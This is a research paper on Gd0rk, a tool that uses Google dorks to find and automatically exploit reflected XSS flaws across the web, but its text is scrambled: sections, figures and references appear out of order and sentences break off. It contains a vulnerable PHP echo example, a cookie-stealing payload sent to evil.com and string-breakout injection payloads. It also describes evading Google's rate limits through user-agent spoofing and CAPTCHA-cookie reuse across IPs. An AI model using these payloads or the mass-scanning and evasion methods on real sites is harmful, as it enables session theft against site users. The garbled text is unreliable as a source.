Automatic Xss Detection Using Google
Automatic Xss Detection Using Google
Automatic Xss Detection Using Google
Riccardo Pelizzi
Tung Tran
Alireza Saberi
Abstract
XSS Attacks continue to be prevalent today, not only
because XSS sanitization is a hard problem in richformatting contexts, but also because there are so many
potential avenues and so many uneducated developers
who forget to sanitize reflected content altogether.
In this paper, we present Gd0rk, a tool which employs Googles advanced search capabilities to scan for
websites vulnerable to XSS. It automatically generates
and maintains a database of parameters to search, and
uses heuristics to prioritize scanning hosts which are
more likely to be vulnerable. Gd0rk includes a highthroughput XSS scanner which reverse engineers and approximates XSS filters using a limited number of web requests and generates working exploits using HTML and
JavaScript context-aware rules.
The output produced by the tool is not only a remarkably vast database of vulnerable websites along with
working XSS exploits, but also a more compact representation of the list in the form of google search terms,
whose effectiveness has been tested during the search.
After running for a month, Gd0rk was able to identify more than 200.000 vulnerable pages. The results
show that even without significant network capabilities,
a large-scale scan for vulnerable websites can be conducted effectively.
Introduction
<script>
var query = "out"; attack();//";
</script>
Static analysis tools to verify the correctness of sanitization functions with respect to the content where they
1
modifier; after this limit has been exceeded, Google presents a CAPTCHA challenge to
the user to increase the limit. Since CAPTCHAs can
be solved from different IPs and used at a later time,
Gd0rk includes a small tool to solve a large number of
CAPTCHAs efficiently, to allow searches to run uninterrupted. Moreover, we use a very small number
of different IPs and send a limited amount of requests
per minute. This does not reduce the scan speed significantly, as one web request to Google can queue up
to 100 URLs for the XSS scanner.
The XSS scanner thread selects one of the search results generated from the Google thread according to a
heuristic which prioritizes results containing parameters
that already appeared in vulnerable websites. The search
result URL is used to generated multiple scan URLs, one
for each URL parameter: the involved parameter value is
modified to include a special scan string, whose purpose
is to detect where the parameter is reflected in the HTML
page and how the string is sanitized against XSS attacks
(if it is sanitized at all). For example, the scan URL for
the parameter term and the google result:
appear do exist [2, 39] but they are not widely employed.
Thus, many websites are still vulnerable to XSS attacks,
and exploits are for the most part trivial.
Google has already been employed as a tool to scan
for web vulnerabilities [10] such XSS [9, 7] and SQL injection [15, 8, 41]. Its advanced features allow to search
for specific strings in the text and in the URL of indexed
pages. For example, text search can be used to look
for specific error messages that reveal useful information
about the web application, while URL search can be used
to detect multiple deployments of specific web applications that are known to be vulnerable, or to search for
web application scripts with a particular behaviour (such
as redirection scripts and mailing scripts). Examples can
be found in the Google Hacking Database [13]. However, the tools referenced above only search and report
vulnerabilities according to a fixed list of search terms.
When these terms are effective in detecting vulnerable
sites, they are called google dorks.
allinurl:
Overview of Approach
http://vuln.com/search.php?term=hello&b=1
becomes 1
http://vuln.com/search.php?term=hello#<a>a"a#&b=1
This allows Gd0rk to probe each parameter for XSS vulnerabilities using just one HTTP request, instead of trying one specific concrete attack at a time. This is important because the Google search thread can create up to
100 results for each request; therefore, Gd0rks throughput largely depends on the throughput of the XSS scanner. The server response to the scan URL is used to create a translation table, an approximation of the filters
sanitization behaviour: by looking at how the scan string
is reflected in the document, it is possible to detect how
single characters are sanitized. A scan string might appear more than once in the document: each reflected instance of the parameter has its own translation table, as
they might be different. Each reflected instance is then
passed to the XSS exploit generator: this module detects
the context of the reflection (the location of the reflected
scan string in the HTML parse tree) and attempts to build
a syntactically correct attack compatible with the sanitization employed by the web application. For example,
given a parameter reflected inside a JavaScript doublequoted string:
<script>
var query = "param";
</script>
First, the attacker uses some means to deliver his malicious payload to the vulnerable web-site. Second, this
payload is used by the web site during the course of generating a web page sent to the users browser. If the web
site is not XSS-vulnerable, it would either discard the
malicious payload, or at least ensure that it does not contribute to JavaScript code content in its output. However,
if the site is vulnerable, then, in the third step, the users
browser would end up executing attacker-injected code
in the page returned by the web site.
There are two approaches that an attacker can use to
accomplish the first step. In a stored XSS attack, the injected code first gets stored on the web-site in a file or
database, and is subsequently used by the web-site while
constructing the victim page. For instance, consider a
site that permits its subscribers to post comments. A vulnerability in this site may allow the attacker to post a
comment that includes <script> tags. When this page is
visited by the user, the attackers comment, including her
script, is included in the page returned to the user.
In a reflected XSS attack, the attacker lures the user to
click a link or visit a malicious web page, which causes a
request from the user to be sent to the vulnerable website.
This request will include one or more malicious parameters properly crafted by the attacker. When a vulnerable web site uses these parameters in the construction of
a responses HTML parse tree (either because it echoes
these parameters into the response page directly without
proper sanitization, or because it serves JavaScript code
that uses this data dynamically to build DOM nodes on
the browser), the attackers code is able to execute on
this response page. When crafting the parameters, the
attacker must take care of two elements:
1. The web application might filter or modify the input provided to prevent XSS attacks. This process is
called sanitization. The attacker needs to work around
the sanitization filter to output syntactically correct
malicious code.
2. The syntax required to execute malicious code depends on the context where the parameter is echoed
in the Web page. For example, if the parameter is supposed to be visible text, then a suitable attack would be
in the form of <script>xss();</script>, inserting a
new script node. However, if the parameter is echoed
inside a JavaScript string, the attack would be in the
form of "; xss(); //, breaking out of the string and
directly injecting malicious code in the existing script
node.
For example, Figure 2 shows how a reflected attack
can be carried out on a vulnerable website: maliciously
crafted input can open a script node in the middle of
the page and execute JavaScript code in the context of
the web application. This code will thus have access to
the domain cookies, and may send them to an external
location controlled by the attacker.
XSS Attacks
XSS Attacks are web vulnerabilities that allow an attacker to inject malicious code in a web page served to
a victim user. Although the attacker is able to run his
code on the users browser by hosting it on his own malicious website and tricking the user into visiting it, the
code runs in a sandbox: the same-origin policy (SOP) enforced by the browser prevents the attackers code from
stealing the users credentials on any other web site, or
observing any (potentially sensitive) data exchanged between other websites and the user. However, XSS attacks
allow the attacker to circumvent the SOP, because a vulnerable site will embed the attacker code directly into
one of its webpages, that is, within the domain boundaries enforced by the SOP.
Exploiting an XSS vulnerability involves three steps.
3
PHP Code
<html>
<head>
<title>Vulnerable Page</title>
</head>
<body>
<h1>Sorry, 0 search results returned for
<?php echo \$_GET["term"]; ?></h1>
</body>
</html>
Malicious Input
http://a.com/search?term=<script>document.location=
4.1
http://evil.com/ + document.cookie</script>
Unfortunately, Google does not allow users to easily retrive a large deal of search results programmatically. The
JSON API, which is specifically offered for automated
querying, is limited to 100 free queries per user per day.
Moreover, it requires a valid key from Google. The alternative is to scrape the web interface. Unfortunately, this
approaches faces other challenges:
The most recent version of the Google Search interface is heavily dynamic and presents all its search results to the user through JavaScript DOM manipulation. To scrape the results from this page, it would be
necessary to simulate a full-fledged JavaScript engine.
Luckily, results in plain HTML are still served to older
clients for compatibility reasons. Thus, we perform
the query spoofing the user agent and impersonating
Internet Explorer 6.
Google limits the rate searches that can be performed
from a single IP; moreover, this limit is even lower
for advanced searches, such as those containing the
allinurl: modifier. After the threshold has been exceeded, Google presents a CAPTCHA challenge to
the user. If the user solves the challenge successfully,
Google returns a cookie that can be used to perform
more queries, exceeding the threshold rate. We discovered that the cookie is not strictly associated to
the IP that solved the challenge: the CAPTCHA can
be solved from one IP and the cookie can be used
at a later time with a different IP. For this reason,
Gd0rk includes a small tool (shown in Figure 3) to
quickly solve CAPTCHAs and avoid interruptions to
the Google crawl. The number of CAPTCHAs required for the search to continue uninterrupted is modest: since one single request returns up to 100 results,
the XSS scanner is more likely to be the bottleneck and
the Google search thread can proceed at a slower pace.
To increase the speed of the search, we use a limited
number of IPs. We also experimented with proxies:
since Web Proxies offer greater speed and availability
than HTTP proxies or TOR [16], we wrote a Python
module to send request through web proxies running
a popular Web Proxy software, Glype [12]. Unfortunately, it seems that these proxies are either handled
differently by Googles throttling policy, or that they
Google Search
Originally based on the pagerank algorithm [26], indexing billions of web pages, Google Search provides a public, large database of URLs. Normally, Google is used as
a keyword-based search engine: users enter search terms
and the most pertinent results are returned. However,
Google also provides many advanced search options. For
example, it allows users to restrict the search to the text
content of HTML links, to the page title, or to a specific domain. One interesting option searches for content in the page URL. To activate this option, users must
prepend their search terms with allinurl:. Searching
for a specific URL format might be more helpful than a
keyword-based search for certain purposes. For example,
allinurl: forum aspx searches for forum applications
written in ASP.NET. A keyword-based search could easily search for forums, but would not be able to express
the language constraint.
Google advanced search features have been used effectively to find security issues. [13] shows many examples of search terms used to find informative error messages, password files, online devices and sensitive services. For example, the search string
"Error Diagnostic Information"
intitle:"Error Occurred While"
XSS Scanner
Gd0rk includes an automatic black-box XSS vulnerability scanner, which is able to identify XSS vulnerabilities
due to incorrect sanitization and generate a working exploit using only a single HTTP request per parameter.
This allows Gd0rk to scan a high number of website in a
small amount of time, which is critical for a large-scale
tool.
The scanners accuracy in detecting vulnerable pages
and generating working exploits depends on its ability to:
reverse-engineer sanitization functions employed by
web applications and approximate them as character
transformations.
detect all occurrences of the reflected parameter in the
page and parse the page to understanding their parse
tree contexts.
To accomplish both goals, the scanner performs one
HTTP request for each parameter in the query string,
modifying these in turn by appending a scan string to
their values.
Injecting the scan string in all parameters at once
would require fewer requests and speed up the scan, but
it would also decrease its accuracy because changing all
parameters at once would more likely cause an error page
to be returned instead of a page constructed with ordinary application logic. Instead, both types of page can
contain vulnerabilities and should be tested. The format
of the scan string is the following:
<html><body>
<script>
var query = "@";
</body></html>
<html><body>
<script>
function foo() {
var query = "@";
return query;
}
</body></html>
Scanning through the context hierarchy from the element to the root yields the string ";}. Then, the actual payload alert(1) is inserted. Finally, the context
is scanned again in reverse to resync the script, yielding function foo() { var bar = ". This generates a
syntactically correct exploit that executes as soon as the
script tag is evaluated, without having to call the function foo. The red text shows the exploit as prepared by
the FSA:
<html><body>
<script>
function foo() {
var query = "";} alert(1); function foo() {
var bar = "%";return query;</body></html>
% Vulnerable
100
80
60
40
20
0
0
3 4
Rank
Results
Conclusions
Related Work
Related work falls roughly into two categories: blackbox web application vulnerability scanners and whitebox source code analyzers.
[22] describes Secubat, perhaps the most similar tool
to Gd0rk: it is a vulnerability scanner that crawls the web
for HTML forms, probing their target URLs for XSS vulnerabilities and SQL injections by appropriately filling
form values and submitting the form. Instead of driving the crawl using google results, Secubat starts from
a single URL provided by the user and follows links
contained in webpages. It can thus be used to scan
a single-web application for vulnerabilities. However,
References
[1] ACUNETIX. Acunetix Web Security Scanner. http://www.
acunetix.com/company/index.htm.
[2] BALZAROTTI , D., C OVA , M., F ELMETSGER , V., J OVANOVIC ,
N., K IRDA , E., K RUEGEL , C., AND V IGNA , G. Saner: Composing static and dynamic analysis to validate sanitization in Web
applications. In IEEE Security and Privacy Symposium (2008).
Context
Reflected
Vulnerable
JS Event
3.50%
3.90%
Text
18.51%
39.84%
Script tag
7.61%
14.47%
Attribute Name
0.02%
0.05%
Attribute Value
45.26%
54.08%
JavaScript URL
0.86%
2.03%
HTML Comment
2.53%
5.43%
Title
4.00%
11.73%
[23] NADJI , Y., S AXENA , P., AND S ONG , D. Document structure integrity: A robust basis for cross-site scripting defense. In Proceedings of the Network and Distributed System Security Symposium
(2009).
http://
[24] NAVA , E. V., AND L INDSAY, D. Our favorite xss filters/ids and
how to attack them. Black Hat USA 2009.
[5] BAU , J., B URSZTEIN , E., G UPTA , D., AND M ITCHELL , J. State
of the art: Automated black-box web application vulnerability
testing. In 2010 IEEE Symposium on Security and Privacy (2010),
IEEE, pp. 332345.
[25] NAVA , E. V., AND L INDSAY, D. Universal xss via ie8s xss filters.
Black Hat Europe 2010.
[26] PAGE , L., B RIN , S., M OTWANI , R., AND W INOGRAD , T. The
PageRank Citation Ranking: Bringing Order to the Web.
http:
[8] D3 HYDR 8.
D3hydr8 Google SQL scanner.
http://
r00tsecurity.org/db/code/txt.php?id=26, 2008.
[9] D3 HYDR 8.
D3hydr8 Google XSS scanner.
http://
darkcode.ath.cx/scanners/XSSscan.py, 2009.
[10] DARK R EADING.
Phishers Enlist Google Dorks.
http://www.darkreading.com/security/
application-security/211201291/index.html,
2008.
[30] S ECURITY, W.
WhiteHat Security.
https://www.
whitehatsec.com/services/services.html.
[37] VAN G UNDY, M., AND C HEN , H. Noncespaces: Using randomization to enforce information flow tracking and thwart cross-site
scripting attacks. In 16th Annual Network & Distributed System
Security Symposium, San Diego, CA, USA (2009).
[42] X IE , Y., AND A IKEN , A. Static detection of security vulnerabilities in scripting languages. In 15th USENIX Security Symposium
(2006), pp. 179192.
[43] Z ALEWSKI , M. skipfish. http://code.google.com/p/
skipfish/.
10